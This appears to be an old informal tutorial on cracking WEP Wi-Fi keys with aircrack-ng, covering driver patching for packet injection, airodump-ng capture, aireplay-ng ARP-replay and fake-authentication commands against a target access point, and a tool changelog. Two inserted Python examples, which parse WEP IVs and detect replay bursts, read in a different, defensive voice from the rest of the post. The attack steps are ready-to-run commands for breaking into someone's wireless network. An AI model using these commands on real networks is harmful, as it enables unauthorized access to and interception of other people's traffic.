1) WHAT YOU NEED
- wireless card
- MAC of the AP (access point)
- MAC of your wireless card
- SSID of the AP
2) COMPILING YOUR KERNEL
- the first thing to do is to compile your kernel and apply the injection patch to the driver
- okay, I've tested this with the ipw2200 and rtl8187 drivers
- let's get started
2.1) IPW2200 card
- your kernel config should look like this:
localhost 1.0-dev # cat /usr/src/linux/.config | grep IPW2200
CONFIG_IPW2200=m
localhost 1.0-dev # cat /usr/src/linux/.config | grep IEEE
CONFIG_IEEE80211=m
CONFIG_IEEE80211_DEBUG=y
CONFIG_IEEE80211_CRYPT_WEP=m
CONFIG_IEEE80211_CRYPT_CCMP=m
CONFIG_IEEE80211_CRYPT_TKIP=m
# CONFIG_IEEE80211_SOFTMAC is not set
# IEEE 1394 (FireWire) support
CONFIG_IEEE1394=y
# CONFIG_IEEE1394_VERBOSEDEBUG is not set
CONFIG_IEEE1394_OHCI1394=y
# CONFIG_IEEE1394_VIDEO1394 is not set
# CONFIG_IEEE1394_SBP2 is not set
# CONFIG_IEEE1394_ETH1394_ROM_ENTRY is not set
# CONFIG_IEEE1394_ETH1394 is not set
# CONFIG_IEEE1394_DV1394 is not set
CONFIG_IEEE1394_RAWIO=y
- then apply the patch (I'm not going to write about how to download a patch, you can do this on your own):
patch /usr/src/linux/drivers/net/wireless/ipw2200.c ipw2200-1.2.1-inject.patch
- your kernel config should now look like this:
localhost 1.0-dev # cat /usr/src/linux/.config | grep IPW2200
CONFIG_IPW2200=m
CONFIG_IPW2200_MONITOR=y
CONFIG_IPW2200_RADIOTAP=y
CONFIG_IPW2200_PROMISCUOUS=y
# CONFIG_IPW2200_QOS is not set
CONFIG_IPW2200_DEBUG=y
- the rest should be the same.
2.2) the rtl8187 card
- let me just say that 2.6.23-x kernels already have support for this card built in, so I would suggest downloading the latest version of the kernel.
- what you should have in your kernel config:
localhost 1.0-dev # cat /usr/src/linux/.config | grep 818
CONFIG_RTL8187=m
3) SOME BACKGROUND INFO
- all cards can receive and send data in ALL modes, but the communication is half-duplex then (so it can only do one thing at a time)
Question: Shouldn't I be in managed mode in order to send packets and in monitor mode in order to receive them?
- well actually you're right, but only for the ipw2200 card
- ipw2200 has a firmware limitation, while you can use rtl8187 in managed+monitor mode simultaneously without any problems. To quote:
"ipw2200 is a great sniffing card but its injection is limited. You need to be on the same channel of the AP you want to attack, and be connected to another AP (obviously also on the same channel and in managed mode)"
- you should use rtl8187 for listening and sniffing and ipw2200 for connecting
Question: Why do I only need to patch the ipw2200 driver and not the rtl8187 one?
- it's because the rtl8187 uses mac80211
- so the rtl8187 isn't patched and it supports monitor mode and injection of packets... thanks to mac80211 and Andy Green. To quote:
"The RTL8187 mac80211 driver will be in the mainline kernel from version 2.6.23 on (now it is in 2.6.23-rc1). The mac80211 framework can be included into older kernels with a patch by Intel and it is included in kernel 2.6.22 and later."
- the ipw2200 uses the ieee80211 stack, which does not come with the injection patch, so you need to patch the ipw2200 driver manually
4) LET's GET TO LISTENING
airodump-ng -c 11 --bssid 00:18:39:BC:B7:65 -w output --ivs wlan0
- use --bssid to capture packets from only ONE network
- use -c for the channel
- use --ivs to capture only the IVs and not the other data too
- use -w to write it all to a file
- you need approximately 200-300k packets to crack 64-bit WEP
- and you need 300-1000k to crack 128-bit WEP
Question: I captured 1 million packets (IVs) with airodump-ng, but when I open that file with aircrack-ng it only says there are about half a million IVs. Why?
That's because your IVs are duplicating: you have already captured every IV that was possible, and the other packets carried IVs you already had, because the capture was going around for the second time.
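The mismatch in the question above comes down to how WEP carries its IV: a 24-bit value sent in the clear right after the 802.11 MAC header of every protected data frame, and aircrack-ng only counts distinct ones. The Python below is an added example, not code from this post or from aircrack-ng: it parses a data frame's header far enough to pull the IV and key index out of a WEP frame, tallies total versus unique IVs over a few constructed frames, and computes how many distinct IVs you would expect from a given number of frames if IVs were drawn uniformly from the 2^24 space, so you can compare that against what airodump-ng and aircrack-ng report. The header layout (24 bytes, plus a fourth address when ToDS and FromDS are both set, plus a 2-byte QoS control for QoS data) follows the 802.11 frame format; every MAC address and frame here is constructed.

```python
from collections import Counter

WEP_IV_SPACE = 1 << 24  # WEP IVs are 24 bits: only 16,777,216 distinct values exist


def wep_iv(frame: bytes):
    """Return (iv, key_index) for a WEP-protected 802.11 data frame, or None.

    The IV is the 3 bytes that follow the MAC header, taken in the order they
    are transmitted; the key index is the top two bits of the 4th byte.
    """
    if len(frame) < 2:
        return None
    fc0, fc1 = frame[0], frame[1]
    if (fc0 & 0x0C) != 0x08:       # type field != data
        return None
    if not fc1 & 0x40:             # Protected Frame flag clear: no IV present
        return None
    hdr = 24                       # FC, duration, addr1-3, sequence control
    if (fc1 & 0x03) == 0x03:       # ToDS and FromDS both set: 4th address present
        hdr += 6
    if fc0 & 0x80:                 # QoS data subtype: 2-byte QoS control follows
        hdr += 2
    if len(frame) < hdr + 4:       # need IV (3 bytes) + key-index/pad byte (1)
        return None
    iv = int.from_bytes(frame[hdr:hdr + 3], "big")
    key_index = frame[hdr + 3] >> 6
    return iv, key_index


def iv_stats(frames):
    """Count total, unique and duplicated IVs over an iterable of raw frames."""
    seen = Counter()
    for frame in frames:
        parsed = wep_iv(frame)
        if parsed is not None:
            seen[parsed[0]] += 1
    total = sum(seen.values())
    return {"total": total, "unique": len(seen), "duplicates": total - len(seen)}


def expected_unique(n_frames, space=WEP_IV_SPACE):
    """Expected number of distinct IVs after n_frames uniformly random picks."""
    return space * (1.0 - (1.0 - 1.0 / space) ** n_frames)


def build_frame(iv: bytes, protected=True, qos=False, both_ds=False, key_index=0) -> bytes:
    """Constructed WEP data frame for testing (addresses are made up, locally administered)."""
    fc0 = 0x08 | (0x80 if qos else 0x00)
    fc1 = (0x40 if protected else 0x00) | (0x03 if both_ds else 0x01)
    header = bytes([fc0, fc1, 0x00, 0x00])           # frame control + duration
    header += bytes.fromhex("020000000001")          # addr1: constructed AP MAC
    header += bytes.fromhex("02000000000a")          # addr2: constructed client MAC
    header += bytes.fromhex("020000000001")          # addr3
    header += bytes([0x10, 0x00])                    # sequence control
    if both_ds:
        header += bytes.fromhex("020000000003")      # addr4
    if qos:
        header += b"\x00\x00"                        # QoS control
    body = iv + bytes([key_index << 6])              # IV + key index/pad byte
    body += b"\xaa\xaa\x03\x00\x00\x00\x08\x06" + b"\x00" * 4   # placeholder ciphertext + ICV
    return header + body


# Constructed capture: five WEP frames using only three distinct IVs, plus frames that must be skipped.
SAMPLE_FRAMES = [
    build_frame(b"\x01\x02\x03"),
    build_frame(b"\x01\x02\x03"),                                # duplicate IV
    build_frame(b"\x04\x05\x06", qos=True),
    build_frame(b"\x04\x05\x06", both_ds=True, key_index=2),     # duplicate IV, WDS-style header
    build_frame(b"\x07\x08\x09"),
    build_frame(b"\x07\x08\x09", protected=False),               # open data frame: no IV
    bytes([0x80, 0x00]) + b"\x00" * 30,                          # beacon (management frame): ignored
    bytes([0x08, 0x41]),                                         # truncated data frame: ignored
]


if __name__ == "__main__":
    print(iv_stats(SAMPLE_FRAMES))
    print("expected distinct IVs in 1,000,000 random frames:", round(expected_unique(1_000_000)))
```

For uniformly random IVs, a million frames would still yield roughly 970,000 distinct values, so a capture that loses half its IVs says more about how the sending card picks IVs than about the IV space being exhausted; either way, the 24-bit IV is the design flaw that makes the whole attack possible.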
5) INJECTING PACKETS
aireplay-ng -3 -b 00:18:39:BC:B7:65 -h 00:1B:2F:42:FA:FB wlan0
- use -h to specify the MAC of your card
- use -b to specify the MAC of the AP
- -3 selects the type of attack
aireplay-ng -1 0 -e eleanor -a 00:18:39:BC:B7:65 -h 00:1B:2F:42:FA:FB wlan0
- for the -1 attack, use -e for the SSID of the AP and -a for its MAC
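Seen from the defender's side, a replay like the one the -3 command above performs is loud: one transmitter repeats the same short WEP data frame hundreds of times per second, which is exactly the pattern a wireless IDS keys on. The Python below is an added example, not part of this post or of aircrack-ng: a simple rate-based check that runs over constructed per-frame summaries (timestamp, transmitter MAC, frame length, 802.11 sequence number) and flags any transmitter that sends at least `threshold` frames of a single size inside a sliding window. It also reports how many distinct sequence numbers the burst used, since a classic heuristic is that a frame re-sent verbatim keeps repeating its sequence number while a live station's firmware keeps incrementing it. The window, the threshold, the 68-byte frame size and the MAC addresses are all assumptions made up for the example.

```python
from collections import Counter, defaultdict, deque


def replay_alerts(records, window=1.0, threshold=100):
    """Flag transmitters that send >= threshold frames of one size inside `window` seconds.

    records: iterable of (timestamp_s, transmitter_mac, frame_length, seq_number).
    Returns one alert dict per offending transmitter (its first burst), including
    how many distinct 802.11 sequence numbers the burst carried.
    """
    by_src = defaultdict(list)
    for ts, src, length, seq in records:
        by_src[src].append((ts, length, seq))

    alerts = []
    for src, frames in by_src.items():
        frames.sort()                       # order by timestamp
        recent = deque()                    # frames inside the current window
        for ts, length, seq in frames:
            recent.append((ts, length, seq))
            while ts - recent[0][0] > window:
                recent.popleft()
            if len(recent) < threshold:
                continue
            top_len, top_n = Counter(f[1] for f in recent).most_common(1)[0]
            if top_n >= threshold:
                seqs = {f[2] for f in recent if f[1] == top_len}
                alerts.append({
                    "src": src,
                    "start": recent[0][0],
                    "frames": top_n,
                    "length": top_len,
                    "distinct_seq": len(seqs),
                })
                break                       # one alert per transmitter is enough here
    return alerts


def constructed_capture():
    """Made-up frame summaries: a normal client plus a station replaying a single frame."""
    recs = []
    # Ordinary client: 10 frames in a second, varying sizes, sequence number advancing.
    for i in range(10):
        recs.append((0.1 * i, "02:00:00:00:00:0a", 100 + 20 * i, 500 + i))
    # Replaying station: the same 68-byte frame 300 times in 0.6 s, sequence number stuck.
    for i in range(300):
        recs.append((2.0 + 0.002 * i, "02:00:00:00:00:0b", 68, 1234))
    return recs


if __name__ == "__main__":
    for alert in replay_alerts(constructed_capture()):
        print(alert)
```

On the constructed data the ordinary client never exceeds ten frames per second and stays silent, while the replaying station trips the check as soon as a hundred identical-length frames land inside one window, with a single sequence number across all of them. The same summaries are easy to produce from a monitor-mode capture, and the -1 fake-authentication command above leaves a similar fingerprint: repeated authentication and association frames from one station that never carries real traffic afterwards.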
6) SOFTWARE
- don't use the aircrack-ng package that ships with your distribution, because it's not the latest version and it doesn't have all the options that are needed.
CHANGES IN THE LAST VERSION
Version 1.0 (changes from aircrack-ng 0.9) - Released ?? ???? 2007:
* airodump-ng: Added --berlin option (see code for more information).
* airodump-ng: Fixed 100% cpu utilization while channelhopping on rtap interface
* airodump-ng: Fixed frame length < 10bytes bug
* airodump-ng: Added out-of-monitor-mode, channel hop and interface down detection
* airodump-ng: Fixed debian bug #417388: airodump-ng doesn't restore terminal after error
* airodump-ng: Fixed opening the same interface more than once
* airodump-ng: Fixed PWR values for some drivers
* airodump-ng: Fixed airodump sanity check (resulted in showing WPA networks without CIPHER & AUTH)
* airodump-ng: Added "-f" to set the time in ms between hopping channels
* airodump-ng: Added partial 40bit WEP detection
* airodump-ng: Added "--showack" to print statistics about ack/cts and rts frames
* airodump-ng: Added "-h" to hide the known stations in ack statistics
* airodump-ng: Added "-r" to read packets from a pcap file
* aircrack-ng: Added BSSID merge option
* aircrack-ng: Added passive ptw attack (using also IP packets for cracking)
* aircrack-ng: Made ptw attack default, for korek attack use -K
* aircrack-ng: Fixed huge memory usage with ptw attack on hundreds of APs
* aircrack-ng: Added -M parameter for specifying maximum number of IVs to be read
* aircrack-ng: Changed ptw testpackets from first to random (fixes invalidation of found keys)
* aircrack-ng: Added --wep-decloak mode
* aircrack-ng: Added --ptw-debug to allow klein or ptw disabling
* aircrack-ng: PTW: Starts a new process group
* aircrack-ng: Increased PTW key checking speed by 20%
* aircrack-ng: Try 1000 40bit keys before starting 104bit cracking, to get the key "instantly" without waiting for 104 bit to fail
* aircrack-ng: Fixed not shown ascii keys, when found key was shorter than expected
* aircrack-ng: Added visual inspection of the different keybytes (--visual-inspection).
* airdecap-ng: Fixed bug in calc_pmk() function causes wrong PMK to be computed
* aireplay-ng: Added usage of RTS/CTS, auth and ACK to --test (more stable and faster)
* aireplay-ng: Added TCP connection test to --test
* aireplay-ng: Changed injection rate to be more stable
* aireplay-ng: Made essid argument optional - sniffs the essid if its broadcasted
* aireplay-ng: Made src mac argument (-h) optional - uses default interface mac
* aireplay-ng: Added bitrate test to --test (-B)
* aireplay-ng: Fixed 100% cpu utilization in --test
* aireplay-ng: Added --fast switch to use first available packet without interaction
* aireplay-ng: chopchop now tries header recreation workaround if icv check failed
* aireplay-ng: Fixed seq field for fragment attack
* aireplay-ng: Now works with rtc_cmos
* aireplay-ng: Added automatic channel changing in --test to AP channel
* aireplay-ng: Added channel synchronisation for --test between cards
* aireplay-ng: Added possibility to limit injection test to one AP "-a" or "-e"
* aireplay-ng: Added BSSID/ESSID detection, so it can be enough to specify one option
* airmon-ng: Added driver detection through sysfs
* airmon-ng: Added mac80211 support
* airmon-ng: Added networkmanager detection - airmon-ng check
* airmon-ng: Fixed interface name detection
* airmon-ng: Fixed Ralink rt73 detection
* airmon-ng: Using real interface name instead of first 7 bytes
* makeivs-ng: Added parameters to set length, number and first IV of generated IVs
* makeivs-ng: Added possibility to generate IVs sequentially or randomly
* makeivs-ng: Added parameters to set percentage of false and dupe frames
* makeivs-ng: Added 256bit wep support
* packetforge-ng: Added support for generating more than one packet
* patches: updated rtl8187 patch for 2.6.22
* patches: updated zd1211rw patch for 2.6.22
* New IVS format for storing all relevant data
* Auto-creation of rtap interface if it doesn't exist (ipw2200)
* Better acx, rtl8180, orinoco and madwifi-ng detection
* Using OpenSSL instead of built-in crypto
* Added library rx/tx support
* Added airpcap rx/tx support
* Added airdriver-ng script for installing and managing patched drivers
* Added wesside-ng as an all in one tool for recovering the wep-key
* Added easside-ng for realtime decryption (instant rx/tx) of wep frames
* Added buddy-ng as loopback server for easside-ng
* Added airserv-ng - server for rx/tx on another system
* Added airolib-ng for using hash tables to crack wpa/wpa2 psk (supports cowpatty rainbow tables)
* Fixed compilation of optimized binaries with icc
* Fixed compilation on FreeBSD, NetBSD, OpenBSD and MacOSX
* Better WDS handling and display
* Added detection and removal of trailing fcs checksum
* Fixed several memory leaks
* Fixed being root when connecting to airserv-ng
* Added OpenBSD sniffing support
- to get the latest version, first install Subversion (the goal of the Subversion project is to build a version control system that is a compelling replacement for CVS in the open source community), then check out the aircrack-ng trunk:
emerge subversion
svn co http://trac.aircrack-ng.org/svn/trunk aircrack-ng
- cd into the directory you just downloaded
- use the tools from there like this: ./src/aireplay-ng ...
7) TESTING
- test whether your driver supports injection (this test also shows whether you compiled your driver correctly):
localhost 1.0-dev # ./src/aireplay-ng -9 wlan0